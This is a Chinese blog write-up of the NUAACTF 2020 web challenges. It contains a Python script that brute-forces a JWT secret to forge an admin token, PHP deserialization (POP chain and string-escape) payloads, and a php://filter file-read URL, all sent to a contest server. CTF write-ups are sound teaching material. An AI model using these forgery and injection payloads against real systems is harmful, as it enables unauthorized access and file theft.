NUAACTF-2020 web 解题思路分享

已于 2022-02-23 16:53:54 修改
阅读量4.4k 收藏 4
点赞数 3
分类专栏: 安全 文章标签: web 安全 信息安全
于 2020-06-01 16:38:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42851946/article/details/106475096
版权

是阳间题
感谢喵师傅的环境,膜:https://miaotony.xyz/2020/05/30/CTF_2020NUAACTF/
web1-checkin
ctrl+u的,没注意到在下面,后来在返回包的html里才看见。。。
nuaactf{we1cOme_to_NuaAcTF}
nuaactf{we1cOme_to_NuaAcTF}

web2-jwt
关于jwt和jwt伪造,膜:https://blog.csdn.net/qq_45521281/article/details/106073624
github上有一个爆破jwt-secret的工具,膜:https://github.com/brendan-rius/c-jwt-cracker
知道原理后我们也可以自己写脚本:
首先随便注册一个号,登上去,看到自己的JWT:

JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImhhbmFvIn0.r8MVWvxF0V8QVmMYn8dMdfSUBAkc1f5LosyaOHoSPbU

把前两部分b64decode,有:

{"alg":"HS256","typ":"JWT"}
{"username":"hanao"}

然后根据加密方式和结果爆破出密码:(python3.8.2)

import hashlib
import hmac
import base64

chars = ["","0","1","2","3","4","5","6","7","8","9","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"]
before = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImhhbmFvIn0".encode('utf-8')
secret = ""
after = "r8MVWvxF0V8QVmMYn8dMdfSUBAkc1f5LosyaOHoSPbU=".encode('utf-8')
#这里要用'='把after补够4的倍数位,方便比较
for i in range(0,62):
   for j in range(0,62):
        for k in range(0,62):
            for l in range(0,62):
                secret = chars[i] + chars[j] + chars[k] + chars[l];
                secret = secret.encode('utf-8')
                result = base64.b64encode(hmac.new(secret, before, digestmod=hashlib.sha256).digest())
                if result == after:
                    print(secret)
                    exit()

用时大概一分钟
用时大概一分钟;
之后就是根据之前的数据伪造JWT;

{"alg":"HS256","typ":"JWT"}
{"username":"admin"}

分别urlbase64后加点进行hmac-sha256;最终伪造出的JWT:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.SYQ-AGwY5XIcxY621ToK8zEgomHE0Bla9tAUWTLxnwA
然后抓包修改JWT,再进入个人中心即可。
nuaactf{haojiGuoGuoTql}
nuaactf{haojiGuoGuoTql}

web3-easypop
直接给了我们代码
没什么逻辑,直接整就行:(PHP)

<?php
class lemon {
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new evil();
    }
}
class evil {
    private $data;
}
echo urlencode(serialize(new lemon()));
?>

运行结果:

O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3BN%3B%7D%7D

访问:

http://139.9.221.0:8088/?d=O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3BN%3B%7D%7D

nuaactf{you_can_really_p0p}
nuaactf{you_can_really_p0p}

web4-command inj
查看源码发现include.php
访问发现?file=index,文件读取:

http://139.9.221.0:8092/include.php?file=php://filter/read=convert.base64-encode/resource=include

伪协议相关,膜:https://blog.csdn.net/Ni9htMar3/article/details/69812306?locationNum=2&fps=1
文件包含相关,膜:https://blog.csdn.net/qq_42181428/article/details/87090539
解码后:

<?php  error_reporting(0);
@$file = $_GET["file"];
if(isset($file)) {
	if (preg_match('/http|data|ftp|input||flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) {
		echo "<p> error! </p>";
	} else {
		include($file.'.php');
		setcookie("tips","createfun.php");
	}
} else {
	header('Location:include.php?file=index');
}
?>

提示createfun.php,再读一次;

<?php
$func = @$_GET['func'];
$arg = @$_GET['arg'];
if(isset($func)&&isset($arg)){$func($arg,'');}

PHP变量名可以当函数用,题目有提到command,试图用很多方式执行命令,但是都报错了,执行不了。惨惨。
考虑到第一个PHP中过滤了flag关键字,猜测flag在flag.php中,show_source:
nuaactf{php_IS_thE_best_language}
nuaactf{php_IS_thE_best_language}

web5-escape
直接给了源码:
关于PHP的魔术方法:https://www.php.net/manual/zh/language.oop5.magic.php
首先是一个单次的过滤,可以双写绕过。
然后,在类C中提示flag.php,所以要让C的成员变量为:flaflagg.php,通过file_get_contents()得到flag
然后让类B的属性b等于类C,就会调用C中的__toString方法。
序列化如下:

<?php
class B{
	public $b;
}
class C{
	public $c = "flaflagg.php";
}

$a = new B();
$a->b = new C();
echo serialize($a);
?>

构造出:O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:12:"flaflagg.php";}}
题目中,序列化对象$a后,将字符串中的flag关键字过滤掉了,很明显是反序列化字符逃逸了,长度变化为4~0:
反序列化字符逃逸详解,膜:https://xz.aliyun.com/t/6718
不断尝试,可以构造:(特别注意最后文件名的字符长度为8,不是12)

?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}

这样的程序执行过程:
赋值:
$a->a=flagflagflagflagflagflag;
$a->b=1";s:8:“password”;O:1:“B”:1:{s:1:“b”;O:1:“C”:1:{s:1:“c”;s:8:“flaflagg.php”;}};
序列化后为:

O:1:"A":2:{s:8:"username";s:24:"flagflagflagflagflagflag";s:8:"password";s:71:"1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}";}

过滤后为:

O:1:"A":2:{s:8:"username";s:24:"";s:8:"password";s:71:"1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}";}

再反序列化时,A的实例的username成员变量会读取24个字符,即:";s:8:“password”;s:71:"1这一段;
后面的就会被读成类B的一个实例,这个实例中的成员变量又是类C的一个实例。最后执行。
flag{you_can_readlly_dance}
flag{you_can_readlly_dance}

**> **> **> **

P.S. 最后这个并不是很懂。。。如果理解有误,烦请各位师傅指正~感谢

Hausa_
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nuaactf-xss-framework:这是为 nuaactf 的 xss 题目准备的测试项目
05-14
nuaactf-2017-xss-framework 该分支为使用 phantomjs 的版本,查看 puppeteer 版本请切换到 puppeteer 分支。 简介 这是为 nuaactf 2017 的 xss 题目准备的测试项目,基于此项目可以快速生成一道 xss 的测试题目。xss 的目标均为 alert(1),且其中的 1 必须为数字 1。 灵感来源:。 部署和访问 npm install npm start 之后访问 即可。 测试流程 首先先使用前端 check,前端将 alert 函数覆盖成了自己写的判断函数,如果前端 check 通过则运行后端 check,后端也用类似的思路调用 phantomjs 来测试是否有 xss。 题目编写 题目和 flag 均在 index.js 中,请注意字符串的转义。 界面修改 界面为 template.html 文件,可以随意修改。
JWT的简单介绍
qq_39691226的博客
06-06 585
  由于HTTP协议是无状态的协议,因此用户登陆后保持登陆状态就是第一个需要解决的问题 在传统的用户登录认证中,因为http是无状态的,所以都是采用session方式。当用户登录成功,服务端会保存一个session,会给客户端一个sessionId客户端会把sessionId保存在cookie中,每次请求都会携带这个sessionId。 cookie+session这种模式通常是保存在内存中...
CTF ---web思路总结
最新发布
A13837377363的博客
03-08 1062
面对一道web题时,先注意题目名字或者提示。如'eazy_sql'则大概率为sql注入题目。若含有'flask''tornado'等词,可以考虑去搜索这些服务器的历史漏洞。
NUAACTF - Web - Ez_Flask
1tachi的博客
12-27 579
按照提示随便传一个:?name=123 可能存在模板渲染,检测一下:?name=${2*7} ?name={{7*7}} ?name={{7*'7'}} 发现是 jinja2 渲染 看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}} 可以一点一点的往下找,也可以直接写payload {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ ==.
JWT学习
开心就好的专栏
03-15 372
基本概念 jwt: JSON Web Token, 原则是在服务器身份验证之后,将生成一个JSON对象并将其发送回用户, 比如生成这样的结构: { "userName": "test", "role": "Admin", "expire": 1584271948 } 之后,当用户与服务器通信时,客户在每次请求时都要带上这个JSON对象。服务器仅依赖于这个JSON对象来标识...
Vue之jwt(跨域身份验证,令牌)
qq_65975514的博客
05-16 4430
1. JWT是什么 JSON Web Token (JWT),它是目前最流行的跨域身份验证解决方案 2. 为什么使用JWT JWT的精髓在于:“去中心化”,数据是保存在客户端的。 3. JWT的工作原理 1. 是在服务器身份验证之后,将生成一个JSON对象并将其发送回用户,示例如下: {"UserName": "Chongchong","Role": "Admin","Expire": "2018-08-08 20:15:56"} 2. 之后,当用户...
JWT
P_YUX的博客
09-08 526
1. JWT是什么 JSON Web Token (JWT),它是目前最流行的跨域身份验证解决方案 2. 为什么使用JWT JWT的精髓在于:“去中心化”,数据是保存在客户端的。 3. JWT的工作原理 是在服务器身份验证之后,将生成一个JSON对象并将其发送回用户,示例如下: {“UserName”: “Chongchong”,“Role”: “Admin”,“Expire”: “20...
JWT总结
m0_62422842的博客
05-25 4052
JWT是什么 全称Json Web Token。是跨域身份认证的一种方式。JWT的声明一般是用来身份提供者与服务提供者之间传递被认证的用户身份信息。便于从服务器获取到资源。它也可以用来记录用户信息。与token不同的是,它不用查询数据库,只要在服务端使用密钥完成校验就行。 JWT的原理 服务器认证以后,就会生成一个json对象,并发回给用户。例如 { "姓名": "张三", "角色": "管理员", "到期时间": "2018年7月1日0点0分" } 之后,客户端再与服务端通讯的时候
ctfhub 技能树 ——JSON Web Token 弱密钥
m0_62879498的博客
04-01 1828
ctfhub 技能树 ——JSON Web Token 弱秘钥 如果JWT采用对称加密算法,并且密钥的强度较弱的话,攻击者可以直接通过蛮力攻击方式来破解密钥。尝试获取flag 和 JSON Web Token 无签名一样,我们使用 admin 和 123456 进行登录查看 发现,和上一关的登录界面相似 我们 使用 Burip suite 进行抓包查看 本关和上一关不同的是 本关不能使用 none算法 换句话说我们需要知道签名的密匙,在关卡一开始就提示我们:JWT采用对称加密算法,并且密钥的强度较
JWT入门
weixin_64987028的博客
05-19 1036
一、JWT简介 1.什么是JWTJWT(JSON WEBTOKEN):JSON网络令牌,JWT是一个轻便的安全跨平台传输格式,定义了一个紧凑的自包含的方式在不同实体之间安全传输信息(JSON格式)。它是在Web环境下两个实体之间传输数据的一项标准。实际上传输的就是一个字符串。广义上讲JWT是一个标准的名称;狭义上JWT指的就是用来传递的那个token字符串。 JSON Web Token (JWT),它是目前最流行的跨域身份验证解决方案 2.为什么要使用JWT? ...
jwt token 附加用户信息_JWT设计单点登录
weixin_36432438的博客
01-14 264
1 什么是JWTJWT是JSON WEB TOKEN的缩写,是为了在网络应用环境建传递声明而执行的一种基于JSON的开放标准。该Toekn被设计为紧凑并且安全的,特别适用于分布式站点的单点登录(SSO)2 传统的session认证传统的session认证是为了让我们的而英勇能识别是哪个用户发送的请求,需要在服务器存储一份用户的登陆信息,这份登陆信息会在返给用户的响应时传递给浏览器,浏览器保存为co...
关于JWT的一些攻击方法
zhangge3663的博客
04-23 1000
前几天做了一个登录页面的绕过,由于认证返回的token是JWT的格式,于是花了一些时间看了看有关于JWT的东西。 #关于JWT JWT的全称为Json Web Token。它遵循JOSN格式,与传统的cookie+session的认证方式不同,服务器使用它的好处是只需要保存秘钥信息,通过加密算法验证token即可,减小了保存用户信息的资源开销。 jwt可以分成三部分,header.payload.signature ## header部分 通常它会长成这个样子 { "alg": ".
JSON Web Token(缩写 JWT
LU_ZHAO的博客
03-28 680
JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案,本文介绍它的原理和用法。 跨域认证的问题 互联网服务离不开用户认证。一般流程是下面这样。 用户向服务器发送用户名和密码。 服务器验证通过后,在当前对话(session)里面保存相关数据,比如用户角色、登录时间等等。 服务器向用户返回一个 session_id,写入用户的 Cookie。 用户随后的每一次请求...
[DASCTF X GFCTF 2022十月挑战赛]EasyPOP
Yu3511606536的博客
10-29 1127
[DASCTF X GFCTF 2022十月挑战赛]EasyPOP
Token验证--JWT
qingxiao1999的博客
09-06 3229
Token的本质是将有意义的数据进行加密处理后的结果,各服务器都只需要具有解析这个加密数据的功能即可获取到其中的信息含义,理论上**不占用内存资源,更适合用于集群和分布式系统,但是,存在一定的被解密的风险(概率极低)。
jwt 原理
weixin_48334703的博客
10-05 1846
1.COOKIE使用和优缺点 1.1 cookie原理: 用户名+密码 cookie是保存在用户浏览器端,用户名和密码等明文信息 1.2 session使用原理 session是存储在服务器端的一段字符串,相当于字典的key 1.用户向服务器发送用户名和密码。 2.验证服务器后,相关数据(如用户角色,登录时间等)将保存在当前会话中。 3.服务器向用户返回session_id,session信息都会写入到用户的Cookie。 4.用户的每个后续请求都将通过在Cookie中取出session_id传给服务器
JWT原理详解
前端那些事@时光
09-27 3227
JWT原理详解 随着前后端分离的发展,以及数据中心的建立,越来越多的公司会创建一个中心服务器,服务于各种产品线。 而这些产品线上的产品,它们可能有着各种终端设备,包括但不仅限于浏览器、桌面应用、移动端应用、平板应用、甚至智能家居 实际上,不同的产品线通常有自己的服务器,产品内部的数据一般和自己的服务器交互。 但中心服务器仍然有必要存在,因为同一家公司的产品总是会存在共享的数据,比如用户数据 这些设备与中心服务器之间会进行http通信 一般来说,中心服务器至少承担着认证和授权的功能,例如登录:各种设备发
JWT认证实现
qq_36636312的博客
12-07 4099
1,jwt认证流程图 2,token组成 Header+Playload+Signature 头部(Header),格式如下: { “typ”: “JWT”, “alg”: “HS256” } 头部存储认证类型和加密算法,将此json使用Base64编码可得到如下个格式的字符串: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 有效载荷(Playload): { "role": [], "iss": "baidu", "exp": 1638841050,
JWTJWT+HA256加密 Token验证
sun
04-08 2360
JWT+HA256验证实施 Token 验证的方法挺多的,还有一些标准方法,比如 JWT,读作:jot ,表示:JSON Web Tokens 。JWT 标准的 Token 有三个部分:headerpayloadsignature中间用点分隔开,并且都会使用 Base64 编码,所以真正的 Token 看起来像这样:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJp...
利用JWT生成Token的原理及公钥和私钥加密和解密的原则
热门推荐
Aplumage的专栏
10-13 1万+
开篇: 实现Token的方式有很多,本篇介绍的是利用Json Web Token(JWT)生成的Token.JWT生成的Token有什么好处呢? 安全性比较高,加上密匙加密而且支持多种算法。 携带的信息是自定义的,而且可以做到验证token是否过期。 验证信息可以由前端保存,后端不需要为保存token消耗内存。 小知识:Base64是一种编码,也就是说,它是可以被翻译回原来的样子来的。它并不是一种加密过程。 什么是JWT? JSON Web...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值